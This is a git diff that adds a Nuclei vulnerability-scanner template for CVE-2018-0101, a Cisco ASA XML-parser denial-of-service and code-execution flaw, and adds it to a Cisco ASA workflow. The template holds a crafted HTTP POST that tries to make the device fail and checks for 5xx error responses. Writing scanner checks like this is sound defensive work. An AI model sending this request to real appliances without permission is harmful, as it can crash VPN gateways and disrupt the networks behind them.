diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml new file mode 100644 index 0000000000..8448e3c2f6 --- /dev/null +++ b/cves/2018/CVE-2018-0101.yaml @@ -0,0 +1,52 @@ +id: CVE-2018-0101 + +info: + name: Cisco ASA Denial-of-Service # Leads to RCE + author: dwisiswant0 + severity: critical + reference: https://www.exploit-db.com/exploits/43986 + description: | + A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, + remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that + the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition. + tags: cve,cve2018,cisco,dos,rce + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + X-Aggregate-Auth: 1 + X-Transcend-Version: 1 + Accept-Encoding: identity + X-AnyConnect-Platform: linux-64 + X-Support-HTTP-Auth: false + X-Pad: 0000000000000000000000000000000000000000 + + + + A + + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + + - type: dsl + dsl: + - "status_code_2 == 500" + - "status_code_2 == 501" + - "status_code_2 == 502" + - "status_code_2 == 503" + - "status_code_2 == 504" + condition: or \ No newline at end of file diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml index 455eb68e1c..1cfe3751a3 100644 --- a/workflows/cisco-asa-workflow.yaml +++ b/workflows/cisco-asa-workflow.yaml @@ -16,4 +16,5 @@ workflows: subtemplates: - template: cves/2020/CVE-2020-3187.yaml - template: cves/2020/CVE-2020-3452.yaml - - template: cves/2018/CVE-2018-0296.yaml \ No newline at end of file + - template: cves/2018/CVE-2018-0296.yaml + - template: cves/2018/CVE-2018-0101.yaml \ No newline at end of file